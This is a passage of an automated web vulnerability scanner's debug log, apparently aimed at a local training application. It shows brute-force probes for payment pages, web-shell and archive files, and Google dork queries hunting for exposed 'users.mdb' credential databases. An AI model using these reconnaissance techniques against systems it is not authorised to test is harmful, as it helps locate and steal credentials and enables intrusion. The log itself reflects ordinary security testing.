(id=2598,from_cache=0,grep=1,rtt=0.17,did=xbbsNNut) [Wed Feb 12 09:41:15 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.rar") took 0.15s to run [Wed Feb 12 09:41:15 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] GET http://localhost:9090/module/validation.cgi returned HTTP code "404" (id=2595,from_cache=0,grep=1,rtt=0.31,did=zbd2O1pI) [Wed Feb 12 09:41:16 2020 - debug] POST http://localhost:9090/libraries/validatepayment.py returned HTTP code "404" (id=2596,from_cache=0,grep=1,rtt=0.18,did=LaMCTlAd) [Wed Feb 12 09:41:16 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:41:16 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.aspx returned HTTP code "404" (id=2594,from_cache=0,grep=1,rtt=0.05,did=XYMDfUcO) [Wed Feb 12 09:41:16 2020 - debug] POST http://localhost:9090/servlet/pay.jsp returned HTTP code "404" (id=2593,from_cache=0,grep=1,rtt=0.15,did=vRkn1HxU) [Wed Feb 12 09:41:16 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.rar") took 0.38s to run [Wed Feb 12 09:41:16 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:16 2020 - debug] POST http://localhost:9090/module/success.php returned HTTP code "404" (id=2597,from_cache=0,grep=1,rtt=0.16,did=Dmpl8jvm) [Wed Feb 12 09:41:16 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.asp returned HTTP code "404" (id=2602,from_cache=0,grep=1,rtt=0.16,did=hqogbkmo) [Wed Feb 12 09:41:16 2020 - debug] POST http://localhost:9090/inc/final.pl returned HTTP code "404" (id=2589,from_cache=0,grep=1,rtt=0.22,did=L0R5OWtq) [Wed Feb 12 09:41:16 2020 - debug] POST http://localhost:9090/inc/complete.rb returned HTTP code "404" (id=2603,from_cache=0,grep=1,rtt=0.31,did=4VgEtz4q) [Wed Feb 12 09:41:17 2020 - debug] POST http://localhost:9090/libraries/paymentsuccessful.php4 returned HTTP code "404" (id=2604,from_cache=0,grep=1,rtt=0.41,did=VoWgpEX0) [Wed Feb 12 09:41:17 2020 - debug] POST http://localhost:9090/module/transactioncomplete.asp returned HTTP code "404" (id=2607,from_cache=0,grep=1,rtt=0.35,did=u9quih2r) [Wed Feb 12 09:41:17 2020 - debug] POST http://localhost:9090/module/finished.jsp returned HTTP code "404" (id=2606,from_cache=0,grep=1,rtt=0.24,did=ltpbAbtx) [Wed Feb 12 09:41:17 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.zip") took 1.61s to run [Wed Feb 12 09:41:17 2020 - debug] GET http://localhost:9090/includes/validate.asp returned HTTP code "404" (id=2609,from_cache=0,grep=1,rtt=0.11,did=vziij6sF) [Wed Feb 12 09:41:17 2020 - debug] localhost:9090 connection pool stats (free:53 / in_use:1 / max:50 / total:54) [Wed Feb 12 09:41:17 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.01 sec) [Wed Feb 12 09:41:17 2020 - debug] GET http://localhost:9090/libraries/valid.asp returned HTTP code "404" (id=2612,from_cache=0,grep=1,rtt=0.26,did=7vR2TWhe) [Wed Feb 12 09:41:17 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.rar") took 0.80s to run [Wed Feb 12 09:41:17 2020 - debug] POST http://localhost:9090/includes/completepay.jsp returned HTTP code "404" (id=2605,from_cache=0,grep=1,rtt=0.21,did=xEcu4OGZ) [Wed Feb 12 09:41:17 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.rar") took 0.81s to run [Wed Feb 12 09:41:17 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.rar") took 0.77s to run [Wed Feb 12 09:41:17 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.rar") took 0.80s to run [Wed Feb 12 09:41:17 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.rar") took 0.77s to run [Wed Feb 12 09:41:17 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.rar") took 0.24s to run [Wed Feb 12 09:41:18 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.rb returned HTTP code "404" (id=2616,from_cache=0,grep=1,rtt=0.04,did=LZwbykrl) [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/includes/validatepay.php returned HTTP code "404" (id=2608,from_cache=0,grep=1,rtt=0.08,did=vqjZXuBs) [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/servlet/final.php4 returned HTTP code "404" (id=2619,from_cache=0,grep=1,rtt=0.12,did=ZJSBJkU5) [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/inc/completepay.aspx returned HTTP code "404" (id=2620,from_cache=0,grep=1,rtt=0.10,did=Wzh3NBXF) [Wed Feb 12 09:41:18 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1162, 'reject-seen-url': 999, 'reject-out-of-scope': 28, 'accept': 211} [Wed Feb 12 09:41:18 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.rar") took 0.85s to run [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/module/valid.php5 returned HTTP code "404" (id=2618,from_cache=0,grep=1,rtt=0.02,did=xPqFHzc6) [Wed Feb 12 09:41:18 2020 - debug] POST http://localhost:9090/modules/validpay.py returned HTTP code "404" (id=2617,from_cache=0,grep=1,rtt=0.34,did=RxDDcEpp) [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/modules/payment.aspx returned HTTP code "404" (id=2615,from_cache=0,grep=1,rtt=0.13,did=aJdinQKJ) [Wed Feb 12 09:41:18 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.rar") took 0.88s to run [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/modules/completepayment.aspx returned HTTP code "404" (id=2611,from_cache=0,grep=1,rtt=0.05,did=jVVgwF5L) [Wed Feb 12 09:41:18 2020 - debug] POST http://localhost:9090/module/validatepayment.py returned HTTP code "404" (id=2601,from_cache=0,grep=1,rtt=0.13,did=NU1rCX3T) [Wed Feb 12 09:41:18 2020 - debug] GET http://localhost:9090/includes/trxcomplete.aspx returned HTTP code "404" (id=2613,from_cache=0,grep=1,rtt=0.24,did=JRGa8qSZ) [Wed Feb 12 09:41:18 2020 - debug] POST http://localhost:9090/servlet/payment.py returned HTTP code "404" (id=2600,from_cache=0,grep=1,rtt=0.17,did=gJyAHdYk) [Wed Feb 12 09:41:19 2020 - debug] GET http://localhost:9090/modules/pay.php5 returned HTTP code "404" (id=2614,from_cache=0,grep=1,rtt=0.28,did=TbDgtsU5) [Wed Feb 12 09:41:19 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 143. [Wed Feb 12 09:41:19 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.py returned HTTP code "404" (id=2610,from_cache=0,grep=1,rtt=0.16,did=FLKYbpcw) [Wed Feb 12 09:41:19 2020 - debug] GET http://www.google.com/search?q=site:localhost intitle:Linksys site:ourlinksys.com&start=0&sa=N&hl=en returned HTTP code "429" (id=2621,from_cache=0,grep=1,rtt=0.33,did=BEHQ4wsp) [Wed Feb 12 09:41:19 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:41:19 2020 - debug] Google search for: 'site:localhost intitle:Linksys site:ourlinksys.com' returned 0 unique results [Wed Feb 12 09:41:19 2020 - debug] GET http://localhost:9090/includes/final.cgi returned HTTP code "404" (id=2622,from_cache=0,grep=1,rtt=0.09,did=4WM9ILyS) [Wed Feb 12 09:41:19 2020 - debug] GET http://localhost:9090/inc/validate.php returned HTTP code "404" (id=2623,from_cache=0,grep=1,rtt=0.06,did=MJTSXdKY) [Wed Feb 12 09:41:19 2020 - debug] POST http://localhost:9090/module/validation.asp returned HTTP code "404" (id=2624,from_cache=0,grep=1,rtt=0.17,did=rhdd2kU2) [Wed Feb 12 09:41:19 2020 - debug] GET http://localhost:9090/servlet/pay.jsp returned HTTP code "404" (id=2625,from_cache=0,grep=1,rtt=0.04,did=NfB9ECrv) [Wed Feb 12 09:41:19 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:19 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:19 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:19 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:19 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:20 2020 - debug] GET http://localhost:9090/libraries/validatepayment.py returned HTTP code "404" (id=2629,from_cache=0,grep=1,rtt=0.26,did=HvnzF8J1) [Wed Feb 12 09:41:20 2020 - debug] POST http://localhost:9090/module/valid.php returned HTTP code "404" (id=2630,from_cache=0,grep=1,rtt=0.10,did=AZzm33Ep) [Wed Feb 12 09:41:20 2020 - debug] GET http://localhost:9090/servlet/successful.aspx returned HTTP code "404" (id=2627,from_cache=0,grep=1,rtt=0.24,did=xTo0wINu) [Wed Feb 12 09:41:20 2020 - debug] localhost:9090 connection pool stats (free:42 / in_use:11 / max:50 / total:53) [Wed Feb 12 09:41:20 2020 - debug] Connections with more in use time: (084f56a9dda1c119, 0.31 sec) (20c6fb7a85d275d0, 0.29 sec) (ff37903b27d7f8f9, 0.29 sec) (d49dc8e833c97ce2, 0.26 sec) (ff9acc2bc4ba5606, 0.25 sec) [Wed Feb 12 09:41:20 2020 - debug] GET http://localhost:9090/includes/complete.aspx returned HTTP code "404" (id=2628,from_cache=0,grep=1,rtt=0.09,did=akrAdVd8) [Wed Feb 12 09:41:20 2020 - debug] POST http://localhost:9090/libraries/valid.py returned HTTP code "404" (id=2632,from_cache=0,grep=1,rtt=0.14,did=LW5icYeE) [Wed Feb 12 09:41:20 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.py returned HTTP code "404" (id=2634,from_cache=0,grep=1,rtt=0.09,did=202ojSCz) [Wed Feb 12 09:41:21 2020 - debug] POST http://localhost:9090/includes/validate.py returned HTTP code "404" (id=2633,from_cache=0,grep=1,rtt=0.50,did=butYE0I6) [Wed Feb 12 09:41:21 2020 - debug] POST http://localhost:9090/servlet/final.php5 returned HTTP code "404" (id=2626,from_cache=0,grep=1,rtt=0.18,did=HMFbdi3P) [Wed Feb 12 09:41:22 2020 - debug] POST http://localhost:9090/modules/pay.php returned HTTP code "404" (id=2641,from_cache=0,grep=1,rtt=0.12,did=E9XNRYRZ) [Wed Feb 12 09:41:22 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.rb returned HTTP code "404" (id=2647,from_cache=0,grep=1,rtt=0.15,did=exF43C5m) [Wed Feb 12 09:41:22 2020 - debug] POST http://localhost:9090/servlet/pay.rb returned HTTP code "404" (id=2648,from_cache=0,grep=1,rtt=0.17,did=SYO8ybQL) [Wed Feb 12 09:41:22 2020 - debug] symfony.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] GET http://localhost:9090/inc/complete.rb returned HTTP code "404" (id=2635,from_cache=0,grep=1,rtt=0.25,did=WLZQqaN5) [Wed Feb 12 09:41:22 2020 - debug] GET http://localhost:9090/module/transactioncomplete.asp returned HTTP code "404" (id=2637,from_cache=0,grep=1,rtt=0.09,did=h0NXZifP) [Wed Feb 12 09:41:22 2020 - debug] file_upload.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] POST http://localhost:9090/inc/completepay.pl returned HTTP code "404" (id=2638,from_cache=0,grep=1,rtt=0.16,did=4Judromn) [Wed Feb 12 09:41:22 2020 - debug] POST http://localhost:9090/modules/payment.pl returned HTTP code "404" (id=2631,from_cache=0,grep=1,rtt=0.22,did=cL9MNw7z) [Wed Feb 12 09:41:22 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] svn_users.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] expect_ct.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] POST http://localhost:9090/modules/completepayment.pl returned HTTP code "404" (id=2640,from_cache=0,grep=1,rtt=0.18,did=RUi9J3u8) [Wed Feb 12 09:41:22 2020 - debug] private_ip.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:22 2020 - debug] POST http://localhost:9090/includes/validatepay.aspx returned HTTP code "404" (id=2636,from_cache=0,grep=1,rtt=0.28,did=xdR7E1Vc) [Wed Feb 12 09:41:23 2020 - debug] motw.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] meta_generator.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] retirejs.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:23 2020 - debug] serialized_object.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] blank_body.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] credit_cards.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] websockets_links.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] csp.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] dom_xss.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] vulners_db.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] keys.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] clamav.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] objects.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] error_500.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] meta_tags.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] password_profiling.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] click_jacking.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] lang.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:23 2020 - debug] POST http://localhost:9090/inc/validate.aspx returned HTTP code "404" (id=2643,from_cache=0,grep=1,rtt=0.37,did=W3YanbEz) [Wed Feb 12 09:41:23 2020 - debug] GET http://localhost:9090/module/success.php returned HTTP code "404" (id=2646,from_cache=0,grep=1,rtt=0.08,did=jpFPhybI) [Wed Feb 12 09:41:23 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:24 2020 - debug] POST http://localhost:9090/includes/trxcomplete.pl returned HTTP code "404" (id=2642,from_cache=0,grep=1,rtt=0.47,did=pFGbKSN5) [Wed Feb 12 09:41:24 2020 - debug] GET http://localhost:9090/includes/completepay.jsp returned HTTP code "404" (id=2645,from_cache=0,grep=1,rtt=0.10,did=NSzvRzpH) [Wed Feb 12 09:41:24 2020 - debug] POST http://localhost:9090/includes/final.asp returned HTTP code "404" (id=2651,from_cache=0,grep=1,rtt=0.30,did=s229kZBR) [Wed Feb 12 09:41:24 2020 - debug] GET http://localhost:9090/inc/final.pl returned HTTP code "404" (id=2650,from_cache=0,grep=1,rtt=0.58,did=CiD8XfZy) [Wed Feb 12 09:41:24 2020 - debug] GET http://localhost:9090/libraries/paymentsuccessful.php4 returned HTTP code "404" (id=2654,from_cache=0,grep=1,rtt=0.47,did=1SjcedlH) [Wed Feb 12 09:41:25 2020 - debug] GET http://localhost:9090/servlet/payment.py returned HTTP code "404" (id=2655,from_cache=0,grep=1,rtt=0.23,did=qHOkSIWk) [Wed Feb 12 09:41:25 2020 - debug] POST http://localhost:9090/servlet/successful.pl returned HTTP code "404" (id=2652,from_cache=0,grep=1,rtt=0.08,did=YzympZe6) [Wed Feb 12 09:41:25 2020 - debug] GET http://localhost:9090/module/validatepayment.py returned HTTP code "404" (id=2653,from_cache=0,grep=1,rtt=0.15,did=hTDcU5bt) [Wed Feb 12 09:41:25 2020 - debug] GET http://localhost:9090/inc/validatepay.aspx returned HTTP code "404" (id=2406,from_cache=0,grep=1,rtt=0.04,did=XpEwYXQR) [Wed Feb 12 09:41:25 2020 - debug] GET http://localhost:9090/module/finished.jsp returned HTTP code "404" (id=2644,from_cache=0,grep=1,rtt=0.21,did=AdzFLAQ0) [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=2402,from_cache=0,grep=0,rtt=0.24,did=EXOfq6zc) [Wed Feb 12 09:41:26 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: EXOfq6zc) [Wed Feb 12 09:41:26 2020 - debug] detailed._login() took 10.69s to run [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/modules/successful.php3 returned HTTP code "404" (id=2407,from_cache=0,grep=1,rtt=0.17,did=ZQPfNgSY) [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/modules/validpay.py returned HTTP code "404" (id=2656,from_cache=0,grep=1,rtt=0.60,did=WKpostek) [Wed Feb 12 09:41:26 2020 - debug] POST http://localhost:9090/includes/complete.pl returned HTTP code "404" (id=2657,from_cache=0,grep=1,rtt=0.26,did=ElzxNT1q) [Wed Feb 12 09:41:26 2020 - debug] error_pages.grep(uri="http://localhost:9090/shell.pl") took 0.12s to run [Wed Feb 12 09:41:26 2020 - debug] strange_reason.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] cache_control.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] strange_headers.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] ssn.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] oracle.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] feeds.grep(uri="http://localhost:9090/shell.pl") took 0.00s to run [Wed Feb 12 09:41:26 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.jsp returned HTTP code "404" (id=2649,from_cache=0,grep=1,rtt=0.24,did=QrfSgkPt) [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.aspx returned HTTP code "404" (id=2639,from_cache=0,grep=1,rtt=0.35,did=aDtpIq3Q) [Wed Feb 12 09:41:26 2020 - debug] localhost:9090 connection pool stats (free:46 / in_use:8 / max:50 / total:54) [Wed Feb 12 09:41:26 2020 - debug] Connections with more in use time: (feefb3b1646a9d56, 0.19 sec) (20c6fb7a85d275d0, 0.12 sec) (ff37903b27d7f8f9, 0.09 sec) (a5419411797e137e, 0.08 sec) (d49dc8e833c97ce2, 0.07 sec) [Wed Feb 12 09:41:26 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/shell.pl") took 0.18s to run [Wed Feb 12 09:41:26 2020 - debug] POST http://localhost:9090/includes/completepay.rb returned HTTP code "404" (id=2660,from_cache=0,grep=1,rtt=0.06,did=p9qRzsjd) [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/module/validation.asp returned HTTP code "404" (id=2658,from_cache=0,grep=1,rtt=0.08,did=uNS1tKKQ) [Wed Feb 12 09:41:26 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.rar") took 2.43s to run [Wed Feb 12 09:41:26 2020 - debug] http_in_body.grep(uri="http://localhost:9090/shell.pl") took 0.64s to run [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/modules/payment.pl returned HTTP code "404" (id=2662,from_cache=0,grep=1,rtt=0.17,did=0M0vLytN) [Wed Feb 12 09:41:26 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.php4 returned HTTP code "404" (id=2665,from_cache=0,grep=1,rtt=0.24,did=cE9gBVdJ) [Wed Feb 12 09:41:26 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/shell.pl") took 0.59s to run [Wed Feb 12 09:41:26 2020 - debug] GET http://localhost:9090/module/return.php4 returned HTTP code "404" (id=2403,from_cache=0,grep=1,rtt=0.27,did=pc6PYhve) [Wed Feb 12 09:41:26 2020 - debug] POST http://localhost:9090/libraries/validatepayment.jsp returned HTTP code "404" (id=2659,from_cache=0,grep=1,rtt=0.17,did=9OzleP1D) [Wed Feb 12 09:41:26 2020 - debug] html_comments.grep(uri="http://localhost:9090/shell.pl") took 0.62s to run [Wed Feb 12 09:41:26 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/shell.pl") took 0.63s to run [Wed Feb 12 09:41:26 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/shell.pl") took 0.65s to run [Wed Feb 12 09:41:26 2020 - debug] url_session.grep(uri="http://localhost:9090/shell.pl") took 0.64s to run [Wed Feb 12 09:41:27 2020 - debug] GET http://localhost:9090/servlet/pay.rb returned HTTP code "404" (id=2666,from_cache=0,grep=1,rtt=0.05,did=Hy5ggcta) [Wed Feb 12 09:41:27 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/shell.pl") took 0.59s to run [Wed Feb 12 09:41:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 142. [Wed Feb 12 09:41:27 2020 - debug] POST http://localhost:9090/modules/paid returned HTTP code "404" (id=2670,from_cache=0,grep=1,rtt=0.15,did=t5Ov0NUq) [Wed Feb 12 09:41:27 2020 - debug] POST http://localhost:9090/inc/complete.php4 returned HTTP code "404" (id=2671,from_cache=0,grep=1,rtt=0.32,did=oH9FvbDN) [Wed Feb 12 09:41:27 2020 - debug] POST http://localhost:9090/libraries/paymentsuccessful.php5 returned HTTP code "404" (id=2663,from_cache=0,grep=1,rtt=0.17,did=l2pCqV2n) [Wed Feb 12 09:41:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:28 2020 - debug] POST http://localhost:9090/servlet/payment.jsp returned HTTP code "404" (id=2669,from_cache=0,grep=1,rtt=0.18,did=r5im2CTX) [Wed Feb 12 09:41:28 2020 - debug] GET http://localhost:9090/servlet/successful.pl returned HTTP code "404" (id=2674,from_cache=0,grep=1,rtt=0.06,did=So4kT5bV) [Wed Feb 12 09:41:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:28 2020 - debug] POST http://localhost:9090/inc/final.php3 returned HTTP code "404" (id=2676,from_cache=0,grep=1,rtt=0.32,did=39XN3A7N) [Wed Feb 12 09:41:29 2020 - debug] POST http://localhost:9090/module/finished.rb returned HTTP code "404" (id=2667,from_cache=0,grep=1,rtt=0.28,did=8N1gameu) [Wed Feb 12 09:41:29 2020 - debug] POST http://localhost:9090/module/transactioncomplete.py returned HTTP code "404" (id=2661,from_cache=0,grep=1,rtt=0.20,did=xgRgjqJM) [Wed Feb 12 09:41:29 2020 - debug] GET http://localhost:9090/includes/validate.py returned HTTP code "404" (id=2673,from_cache=0,grep=1,rtt=0.29,did=2KizEk5y) [Wed Feb 12 09:41:29 2020 - debug] POST http://localhost:9090/module/success.aspx returned HTTP code "404" (id=2664,from_cache=0,grep=1,rtt=0.19,did=9M6dI3cY) [Wed Feb 12 09:41:29 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.py returned HTTP code "404" (id=2672,from_cache=0,grep=1,rtt=0.16,did=uITC0LFR) [Wed Feb 12 09:41:29 2020 - debug] POST http://localhost:9090/module/validatepayment.jsp returned HTTP code "404" (id=2675,from_cache=0,grep=1,rtt=0.50,did=8WT05jAa) [Wed Feb 12 09:41:29 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.pl returned HTTP code "404" (id=2677,from_cache=0,grep=1,rtt=0.18,did=ko9Ht21R) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/libraries/valid.py returned HTTP code "404" (id=2668,from_cache=0,grep=1,rtt=0.30,did=i4Oz1cKY) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/modules/completepayment.pl returned HTTP code "404" (id=2678,from_cache=0,grep=1,rtt=0.47,did=KQoIdwyB) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/servlet/final.php5 returned HTTP code "404" (id=2679,from_cache=0,grep=1,rtt=0.24,did=xk08vtxK) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/inc/completepay.pl returned HTTP code "404" (id=2680,from_cache=0,grep=1,rtt=0.15,did=2R9702Ua) [Wed Feb 12 09:41:30 2020 - debug] POST http://localhost:9090/inc/validatepay.pl returned HTTP code "404" (id=2683,from_cache=0,grep=1,rtt=0.21,did=PtH9H7kZ) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/module/valid.php returned HTTP code "404" (id=2682,from_cache=0,grep=1,rtt=0.29,did=Fb66pSKI) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/includes/validatepay.aspx returned HTTP code "404" (id=2681,from_cache=0,grep=1,rtt=0.14,did=TfiHnC6e) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/includes/final.asp returned HTTP code "404" (id=2685,from_cache=0,grep=1,rtt=0.16,did=khx0gfwX) [Wed Feb 12 09:41:30 2020 - debug] POST http://localhost:9090/modules/validpay.jsp returned HTTP code "404" (id=2686,from_cache=0,grep=1,rtt=0.12,did=PuQuWJ6S) [Wed Feb 12 09:41:30 2020 - debug] GET http://localhost:9090/inc/validate.aspx returned HTTP code "404" (id=2684,from_cache=0,grep=1,rtt=0.14,did=z7LvNUry) [Wed Feb 12 09:41:30 2020 - debug] GET http://ajax.googleapis.com/ajax/services/search/web?q=site:localhost filetype:mdb inurl:users.mdb&start=0&rsz=8&v=1.0 returned HTTP code "200" (id=2687,from_cache=0,grep=1,rtt=1.25,did=W5nIl0re) [Wed Feb 12 09:41:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1198, 'reject-seen-url': 1037, 'reject-out-of-scope': 29, 'accept': 211} [Wed Feb 12 09:41:31 2020 - debug] symfony.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] Invalid JSON format returned by Google, response status needs to be 200, got "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)" instead. [Wed Feb 12 09:41:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] GET 